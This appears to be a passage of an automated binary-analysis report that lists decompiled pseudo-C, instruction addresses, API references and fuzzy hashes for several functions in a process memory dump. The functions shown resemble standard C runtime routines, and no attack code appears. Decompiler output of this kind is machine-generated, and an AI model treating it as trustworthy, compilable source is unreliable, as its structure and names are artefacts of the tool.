                                            • Opcode Fuzzy Hash: 5d2ec38503853c8d7e4c4509720edbe14d55b0d3834f5692cb546f78b379607a
                                            • Instruction Fuzzy Hash: 40D067B8C0020CBBCB06EFA5D456CDEBBBCAA04744F5084A6ED159B641E674E2488B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00311568, Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 41%
                                            			E00311568(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t41;
				intOrPtr _t42;
				intOrPtr* _t64;
				intOrPtr _t69;
				signed int _t70;
				signed char _t72;
				signed char _t73;
				signed char* _t95;
				signed char _t100;
				signed char** _t102;
				signed char* _t105;
				void* _t106;

				_push(0xc);
				_push(0x32cf18);
				E00316090(__ebx, __edi, __esi);
				_t69 = 0;
				_t41 =  *(_t106 + 0x10);
				_t72 = _t41[4];
				if(_t72 == 0 ||  *((intOrPtr*)(_t72 + 8)) == 0) {
					L34:
					_t42 = 0;
				} else {
					_t100 = _t41[8];
					if(_t100 != 0 || ( *_t41 & 0x80000000) != 0) {
						_t73 =  *_t41;
						_t102 =  *(_t106 + 0xc);
						if(_t73 >= 0) {
							_t102 =  &(_t102[3]) + _t100;
						}
						 *((intOrPtr*)(_t106 - 4)) = _t69;
						_t105 =  *(_t106 + 0x14);
						if(_t73 >= 0 || ( *_t105 & 0x00000010) == 0) {
							L14:
							_push(1);
							_t16 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x4b65e8
							_push( *_t16);
							if((_t73 & 0x00000008) == 0) {
								if(( *_t105 & 0x00000001) == 0) {
									if(_t105[0x18] != _t69) {
										if(E0031B391() == 0) {
											goto L32;
										} else {
											_push(1);
											if(E0031B391(_t102) == 0 || E0031B391(_t105[0x18]) == 0) {
												goto L32;
											} else {
												_t70 = 0;
												_t69 = (_t70 & 0xffffff00 | ( *_t105 & 0x00000004) != 0x00000000) + 1;
												 *((intOrPtr*)(_t106 - 0x1c)) = _t69;
											}
										}
									} else {
										if(E0031B391() == 0) {
											goto L32;
										} else {
											_push(1);
											if(E0031B391(_t102) == 0) {
												goto L32;
											} else {
												_t32 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x4b65e8
												E0030D480(_t102, E003114B5( *_t32,  &(_t105[8])), _t105[0x14]);
											}
										}
									}
								} else {
									if(E0031B391() == 0) {
										goto L32;
									} else {
										_push(1);
										if(E0031B391(_t102) == 0) {
											goto L32;
										} else {
											_t25 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x4b65e8
											E0030D480(_t102,  *_t25, _t105[0x14]);
											if(_t105[0x14] == 4 &&  *_t102 != 0) {
												_push( &(_t105[8]));
												_push( *_t102);
												goto L13;
											}
										}
									}
								}
							} else {
								if(E0031B391() == 0) {
									goto L32;
								} else {
									_push(1);
									if(E0031B391(_t102) == 0) {
										goto L32;
									} else {
										_t20 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x4b65e8
										_t95 =  *_t20;
										goto L12;
									}
								}
							}
						} else {
							_t64 =  *0x331e08; // 0x0
							if(_t64 == 0) {
								goto L14;
							} else {
								 *(_t106 + 0x10) =  *_t64();
								_push(1);
								if(E0031B391(_t65) == 0) {
									L32:
									E003168A0();
								} else {
									_push(1);
									if(E0031B391(_t102) == 0) {
										goto L32;
									} else {
										_t95 =  *(_t106 + 0x10);
										L12:
										 *_t102 = _t95;
										_push( &(_t105[8]));
										_push(_t95);
										L13:
										 *_t102 = E003114B5();
									}
								}
							}
						}
						 *((intOrPtr*)(_t106 - 4)) = 0xfffffffe;
						_t42 = _t69;
					} else {
						goto L34;
					}
				}
				return E003160D5(_t42);
			}















                                            0x00311568
                                            0x0031156a
                                            0x0031156f
                                            0x00311574
                                            0x00311576
                                            0x00311579
                                            0x0031157e
                                            0x00311722
                                            0x00311722
                                            0x0031158d
                                            0x0031158d
                                            0x00311592
                                            0x003115a0
                                            0x003115a2
                                            0x003115a7
                                            0x003115ac
                                            0x003115ac
                                            0x003115ae
                                            0x003115b1
                                            0x003115b6
                                            0x00311607
                                            0x00311607
                                            0x0031160c
                                            0x0031160c
                                            0x00311612
                                            0x00311640
                                            0x00311696
                                            0x003116da
                                            0x00000000
                                            0x003116dc
                                            0x003116dc
                                            0x003116e8
                                            0x00000000
                                            0x003116f7
                                            0x003116fc
                                            0x00311700
                                            0x00311701
                                            0x00311701
                                            0x003116e8
                                            0x00311698
                                            0x003116a1
                                            0x00000000
                                            0x003116a3
                                            0x003116a3
                                            0x003116af
                                            0x00000000
                                            0x003116b1
                                            0x003116bb
                                            0x003116c7
                                            0x003116cc
                                            0x003116af
                                            0x003116a1
                                            0x00311642
                                            0x0031164b
                                            0x00000000
                                            0x00311651
                                            0x00311651
                                            0x0031165d
                                            0x00000000
                                            0x00311663
                                            0x00311669
                                            0x0031166d
                                            0x00311679
                                            0x0031168b
                                            0x0031168c
                                            0x00000000
                                            0x0031168c
                                            0x00311679
                                            0x0031165d
                                            0x0031164b
                                            0x00311614
                                            0x0031161d
                                            0x00000000
                                            0x00311623
                                            0x00311623
                                            0x0031162f
                                            0x00000000
                                            0x00311635
                                            0x00311638
                                            0x00311638
                                            0x00000000
                                            0x00311638
                                            0x0031162f
                                            0x0031161d
                                            0x003115bd
                                            0x003115bd
                                            0x003115c4
                                            0x00000000
                                            0x003115c6
                                            0x003115c8
                                            0x003115cb
                                            0x003115d7
                                            0x00311706
                                            0x00311706
                                            0x003115dd
                                            0x003115dd
                                            0x003115e9
                                            0x00000000
                                            0x003115ef
                                            0x003115ef
                                            0x003115f2
                                            0x003115f2
                                            0x003115f7
                                            0x003115f8
                                            0x003115f9
                                            0x00311600
                                            0x00311600
                                            0x003115e9
                                            0x003115d7
                                            0x003115c4
                                            0x0031170b
                                            0x00311712
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00311592
                                            0x00311729

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AdjustPointer_memmove
                                            • String ID:
                                            • API String ID: 1721217611-0
                                            • Opcode ID: 0d2690f274541e4647895e9d972d2341ef1766abf4f1b3ddf20215ff4d8a4e95
                                            • Instruction ID: aeba0a113e2022d281dd5009e3ab7879fd52cc275fabd1848ece5db504d83593
                                            • Opcode Fuzzy Hash: 0d2690f274541e4647895e9d972d2341ef1766abf4f1b3ddf20215ff4d8a4e95
                                            • Instruction Fuzzy Hash: BD41C6396047026EEB3F5E26D891BE673E4AF0E360F25041DFA419A2D1EB31D8C1C610
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00310500, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00310500(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				signed int _t50;
				void* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t79;
				signed int _t87;
				signed int _t92;
				intOrPtr* _t96;
				void* _t97;

				_push(_t72);
				_t73 = _a8;
				if(_t73 == 0) {
					L4:
					_t50 = 0;
					L5:
					return _t50;
				}
				_t70 = _a12;
				if(_t70 == 0) {
					goto L4;
				}
				_t96 = _a16;
				_t100 = _t96;
				if(_t96 != 0) {
					__eflags = _a4;
					if(__eflags == 0) {
						goto L3;
					}
					__eflags = _t70 - (_t49 | 0xffffffff) / _t73;
					if(__eflags > 0) {
						goto L3;
					}
					_t92 = _t73 * _t70;
					__eflags =  *(_t96 + 0xc) & 0x0000010c;
					_t71 = _t92;
					if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
						_t74 = 0x1000;
					} else {
						_t74 =  *(_t96 + 0x18);
					}
					_v8 = _t74;
					__eflags = _t92;
					if(_t92 == 0) {
						L34:
						_t50 = _a12;
						goto L5;
					} else {
						do {
							_t84 =  *(_t96 + 0xc) & 0x00000108;
							__eflags = _t84;
							if(_t84 == 0) {
								L18:
								__eflags = _t71 - _t74;
								if(_t71 < _t74) {
									_t57 = E003145A3( *_a4, _t96);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										L36:
										_t50 = (_t92 - _t71) / _a8;
										goto L5;
									}
									_a4 = _a4 + 1;
									_t71 = _t71 - 1;
									_t74 =  *(_t96 + 0x18);
									_v8 = _t74;
									__eflags = _t74;
									if(_t74 <= 0) {
										_t74 = 1;
										__eflags = 1;
										_v8 = 1;
									}
									goto L33;
								}
								__eflags = _t84;
								if(_t84 == 0) {
									L22:
									_t59 = _t71;
									__eflags = _t74;
									if(_t74 == 0) {
										_v12 = _t71;
									} else {
										_t84 = _t59 % _t74;
										_t59 = _t71 - _t59 % _t74;
										_v12 = _t59;
									}
									_push(_t59);
									_push(_a4);
									_push(E00319F9D(_t96));
									_t61 = E0031A24F(_t71, _t84, _t92, _t96, __eflags);
									_t97 = _t97 + 0xc;
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										L35:
										_t43 = _t96 + 0xc;
										 *_t43 =  *(_t96 + 0xc) | 0x00000020;
										__eflags =  *_t43;
										goto L36;
									} else {
										_t79 = _v12;
										_t87 = _t79;
										__eflags = _t61 - _t79;
										if(_t61 <= _t79) {
											_t87 = _t61;
										}
										_a4 = _a4 + _t87;
										_t71 = _t71 - _t87;
										__eflags = _t61 - _t79;
										if(_t61 < _t79) {
											goto L35;
										} else {
											L29:
											_t74 = _v8;
											goto L33;
										}
									}
								}
								_t62 = E0030FF97(_t84, _t96);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L36;
								}
								_t74 = _v8;
								goto L22;
							}
							_t63 =  *(_t96 + 4);
							_v12 = _t63;
							__eflags = _t63;
							if(__eflags == 0) {
								goto L18;
							}
							if(__eflags < 0) {
								goto L35;
							}
							__eflags = _t71 - _t63;
							if(_t71 < _t63) {
								_t63 = _t71;
								_v12 = _t71;
							}
							E0030EE10( *_t96, _a4, _t63);
							_t65 = _v12;
							_t97 = _t97 + 0xc;
							 *(_t96 + 4) =  *(_t96 + 4) - _t65;
							_t71 = _t71 - _t65;
							 *_t96 =  *_t96 + _t65;
							_a4 = _a4 + _t65;
							goto L29;
							L33:
							__eflags = _t71;
						} while (_t71 != 0);
						goto L34;
					}
				}
				L3:
				 *((intOrPtr*)(E0030E9C6(_t100))) = 0x16;
				E00314568();
				goto L4;
			}


























                                            0x00310504
                                            0x00310505
                                            0x0031050d
                                            0x0031052d
                                            0x0031052d
                                            0x0031052f
                                            0x00310535
                                            0x00310535
                                            0x0031050f
                                            0x00310514
                                            0x00000000
                                            0x00000000
                                            0x00310516
                                            0x00310519
                                            0x0031051b
                                            0x00310536
                                            0x0031053a
                                            0x00000000
                                            0x00000000
                                            0x00310543
                                            0x00310545
                                            0x00000000
                                            0x00000000
                                            0x00310549
                                            0x0031054c
                                            0x00310553
                                            0x00310555
                                            0x0031055c
                                            0x00310557
                                            0x00310557
                                            0x00310557
                                            0x00310561
                                            0x00310564
                                            0x00310566
                                            0x0031063f
                                            0x0031063f
                                            0x00000000
                                            0x0031056c
                                            0x0031056c
                                            0x0031056f
                                            0x0031056f
                                            0x00310575
                                            0x003105ad
                                            0x003105ad
                                            0x003105af
                                            0x00310617
                                            0x0031061e
                                            0x00310621
                                            0x0031064b
                                            0x00310651
                                            0x00000000
                                            0x00310651
                                            0x00310623
                                            0x00310626
                                            0x00310627
                                            0x0031062a
                                            0x0031062d
                                            0x0031062f
                                            0x00310633
                                            0x00310633
                                            0x00310634
                                            0x00310634
                                            0x00000000
                                            0x0031062f
                                            0x003105b1
                                            0x003105b3
                                            0x003105c7
                                            0x003105c7
                                            0x003105c9
                                            0x003105cb
                                            0x003105da
                                            0x003105cd
                                            0x003105cf
                                            0x003105d3
                                            0x003105d5
                                            0x003105d5
                                            0x003105dd
                                            0x003105de
                                            0x003105e8
                                            0x003105e9
                                            0x003105ee
                                            0x003105f1
                                            0x003105f4
                                            0x00310647
                                            0x00310647
                                            0x00310647
                                            0x00310647
                                            0x00000000
                                            0x003105f6
                                            0x003105f6
                                            0x003105f9
                                            0x003105fb
                                            0x003105fd
                                            0x003105ff
                                            0x003105ff
                                            0x00310601
                                            0x00310604
                                            0x00310606
                                            0x00310608
                                            0x00000000
                                            0x0031060a
                                            0x0031060a
                                            0x0031060a
                                            0x00000000
                                            0x0031060a
                                            0x00310608
                                            0x003105f4
                                            0x003105b6
                                            0x003105bc
                                            0x003105be
                                            0x00000000
                                            0x00000000
                                            0x003105c4
                                            0x00000000
                                            0x003105c4
                                            0x00310577
                                            0x0031057a
                                            0x0031057d
                                            0x0031057f
                                            0x00000000
                                            0x00000000
                                            0x00310581
                                            0x00000000
                                            0x00000000
                                            0x00310587
                                            0x00310589
                                            0x0031058b
                                            0x0031058d
                                            0x0031058d
                                            0x00310596
                                            0x0031059b
                                            0x0031059e
                                            0x003105a1
                                            0x003105a4
                                            0x003105a6
                                            0x003105a8
                                            0x00000000
                                            0x00310637
                                            0x00310637
                                            0x00310637
                                            0x00000000
                                            0x0031056c
                                            0x00310566
                                            0x0031051d
                                            0x00310522
                                            0x00310528
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                            • String ID:
                                            • API String ID: 2782032738-0
                                            • Opcode ID: 968457e186fe9c00490bb461027bae94e5830f662abfba4f89bb770b8509ae29
                                            • Instruction ID: ba8689ab624d183530cf9e34b31e81b3251538f39a8df88036a83dc3578e5282
                                            • Opcode Fuzzy Hash: 968457e186fe9c00490bb461027bae94e5830f662abfba4f89bb770b8509ae29
                                            • Instruction Fuzzy Hash: 2A41B3706046059FDB2E9F69C8805EE77A6EF89360B24852DE819CB580D7B1DDD08F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0032072D, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0032072D(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E0030EA1A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E0031B5FA( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E0030E9C6(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                            0x00320735
                                            0x0032073a
                                            0x00320754
                                            0x00000000
                                            0x00320754
                                            0x0032073c
                                            0x00320741
                                            0x00000000
                                            0x00000000
                                            0x00320746
                                            0x00320763
                                            0x00320768
                                            0x0032076b
                                            0x00320772
                                            0x00320791
                                            0x00320798
                                            0x0032079a
                                            0x003207de
                                            0x003207ed
                                            0x003207fb
                                            0x003207fd
                                            0x0032080d
                                            0x0032080d
                                            0x00320811
                                            0x00320813
                                            0x00320816
                                            0x00320816
                                            0x00320816
                                            0x00320816
                                            0x00000000
                                            0x0032081c
                                            0x003207ff
                                            0x003207ff
                                            0x00320804
                                            0x00320804
                                            0x00320807
                                            0x00000000
                                            0x00320807
                                            0x0032079c
                                            0x0032079f
                                            0x003207a3
                                            0x003207cc
                                            0x003207cc
                                            0x003207cf
                                            0x003207cf
                                            0x00000000
                                            0x00000000
                                            0x003207d1
                                            0x003207d5
                                            0x00000000
                                            0x00000000
                                            0x003207d7
                                            0x003207d7
                                            0x00000000
                                            0x003207d7
                                            0x003207a5
                                            0x003207a8
                                            0x00000000
                                            0x00000000
                                            0x003207ac
                                            0x003207bf
                                            0x003207c5
                                            0x003207c8
                                            0x003207ca
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003207ca
                                            0x00320774
                                            0x00320777
                                            0x00320779
                                            0x0032077e
                                            0x0032077e
                                            0x00320783
                                            0x00000000
                                            0x00320783
                                            0x00320748
                                            0x0032074d
                                            0x00320751
                                            0x00320751
                                            0x00000000

                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00320763
                                            • __isleadbyte_l.LIBCMT ref: 00320791
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0031479A,00000001,00000000,00000000), ref: 003207BF
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0031479A,00000001,00000000,00000000), ref: 003207F5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 58ca294fbda0998faf9ea27eda82aa552a35fdb3486e9e2c393a57552630ef42
                                            • Instruction ID: 1951025e5386ee3685f0722449c266dbab21eed6ae14fa331081339810d7f665
                                            • Opcode Fuzzy Hash: 58ca294fbda0998faf9ea27eda82aa552a35fdb3486e9e2c393a57552630ef42
                                            • Instruction Fuzzy Hash: 3D31D930600266AFDB278F79DC44BAB7FA9FF41310F164429E8249B192E731E855DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00310E9B, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E00310E9B(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t31 = __esi;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E003114DA(__ebx, _t30, __esi, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0030F8DD(_t28);
				_push(_t31);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00311778(_t27, _t29, _t30, _t32, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00310C95(_t27, _t29, _t30, _t32, _t37);
				if(_t25 != 0) {
					E0030F8AB(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                                            0x00310e9b
                                            0x00310e9b
                                            0x00310e9e
                                            0x00310ea3
                                            0x00310ea6
                                            0x00310ea8
                                            0x00310eab
                                            0x00310eae
                                            0x00310eaf
                                            0x00310eb2
                                            0x00310eb7
                                            0x00310eb7
                                            0x00310eba
                                            0x00310ebe
                                            0x00310ec1
                                            0x00310ec6
                                            0x00310ec3
                                            0x00310ec3
                                            0x00310ec3
                                            0x00310ec9
                                            0x00310ece
                                            0x00310ecf
                                            0x00310ed2
                                            0x00310ed4
                                            0x00310ed7
                                            0x00310eda
                                            0x00310edb
                                            0x00310ee4
                                            0x00310ee9
                                            0x00310eec
                                            0x00310ef2
                                            0x00310ef5
                                            0x00310ef8
                                            0x00310efb
                                            0x00310efc
                                            0x00310eff
                                            0x00310f0a
                                            0x00310f0e
                                            0x00000000
                                            0x00310f0e
                                            0x00310f15

                                            APIs
                                            • ___BuildCatchObject.LIBCMT ref: 00310EB2
                                              • Part of subcall function 003114DA: ___AdjustPointer.LIBCMT ref: 00311523
                                            • _UnwindNestedFrames.LIBCMT ref: 00310EC9
                                            • ___FrameUnwindToState.LIBCMT ref: 00310EDB
                                            • CallCatchBlock.LIBCMT ref: 00310EFF
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                            • String ID:
                                            • API String ID: 2633735394-0
                                            • Opcode ID: 82f03a8d6efc1e04fc6cbfb278a6b346684c2316dd7c2ea162f50a869836ad49
                                            • Instruction ID: 06c9b7e087a6344dc394cf763774a2200ef87b456b7871369fb707334cd76366
                                            • Opcode Fuzzy Hash: 82f03a8d6efc1e04fc6cbfb278a6b346684c2316dd7c2ea162f50a869836ad49
                                            • Instruction Fuzzy Hash: 5F011732000108BBCF265F55CC01EDB3BBAEF5C750F158514F91869160C372E8A19BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00318ECD, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00318ECD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0031941E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00318F53(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00319699(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E003195D8(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                            0x00318ed0
                                            0x00318ed6
                                            0x00318f49
                                            0x00000000
                                            0x00318edd
                                            0x00318edd
                                            0x00318ee0
                                            0x00318efb
                                            0x00318efe
                                            0x00318f1e
                                            0x00318f30
                                            0x00318f00
                                            0x00318f00
                                            0x00318f03
                                            0x00000000
                                            0x00318f05
                                            0x00318f17
                                            0x00318f17
                                            0x00318f03
                                            0x00318f4e
                                            0x00318f52
                                            0x00318ee2
                                            0x00318efa
                                            0x00318efa
                                            0x00318ee0

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction ID: 0c81608db5f8e9db03a25377fd8dc7e30494f7246fb477b7723bf8bc2ffd175a
                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction Fuzzy Hash: E201487200414EBBCF1B5F84DC118EE3F67BB1D390B598425FA5898431CB36C9B2AB85
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00303CA0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 76%
                                            			E00303CA0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v116;
				intOrPtr _v120;
				char _v126;
				char _v127;
				long _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t56;
				short* _t57;
				int _t61;
				signed int _t65;
				intOrPtr _t67;
				signed int _t69;
				char _t71;
				intOrPtr _t73;
				signed char _t74;
				intOrPtr _t76;
				intOrPtr _t80;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t89;
				intOrPtr _t93;
				signed int _t96;
				signed int _t97;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t101;
				intOrPtr _t103;

				_t52 = _a16;
				_v120 = __ecx;
				_t76 =  *((intOrPtr*)(_t52 + 0x1c));
				_t80 =  *((intOrPtr*)(_t52 + 0x18));
				_t89 = _t76;
				if(_t89 > 0) {
					L8:
					_t53 = 0x24;
					_v136 = 0x24;
					L10:
					asm("movsd xmm1, [ebp+0x1c]");
					asm("cdq");
					_t81 = _t80 - _t53;
					asm("sbb edi, edx");
					_t73 = 0;
					_t67 = 0;
					_v140 = 0;
					_t56 =  *(_a16 + 0x14) & 0x00003000;
					_v132 = 0;
					if(_t56 != 0x2000) {
						L31:
						_t77 = _a16;
						_t57 =  &_v127;
						_v128 = 0x25;
						_t74 =  *(_a16 + 0x14);
						if((_t74 & 0x00000020) != 0) {
							_v127 = 0x2b;
							_t57 =  &_v126;
						}
						if((_t74 & 0x00000010) != 0) {
							 *_t57 = 0x23;
							_t57 = _t57 + 1;
						}
						 *_t57 = 0x2a2e;
						_t69 = _t74 & 0x00003000;
						if((_t74 & 0x00000004) == 0) {
							if(_t69 != 0x2000) {
								if(_t69 != 0x3000) {
									_t71 = 0x65 + (_t69 & 0xffffff00 | _t69 != 0x00001000) * 2;
								} else {
									_t71 = 0x61;
								}
								goto L45;
							}
							goto L41;
						} else {
							if(_t69 == 0x2000) {
								L41:
								_t71 = 0x66;
								L45:
								 *((char*)(_t57 + 2)) = _t71;
								asm("movsd [esp], xmm1");
								 *((char*)(_t57 + 3)) = 0;
								_t61 = swprintf( &_v116, 0x6c,  &_v128, _v136);
								_t82 = _a4;
								E003055B0(_v120, _t82, _a8, _a12, _t77, _a20,  &_v116, _v140, _v132, _t81, _t61);
								return _t82;
							}
							if(_t69 != 0x3000) {
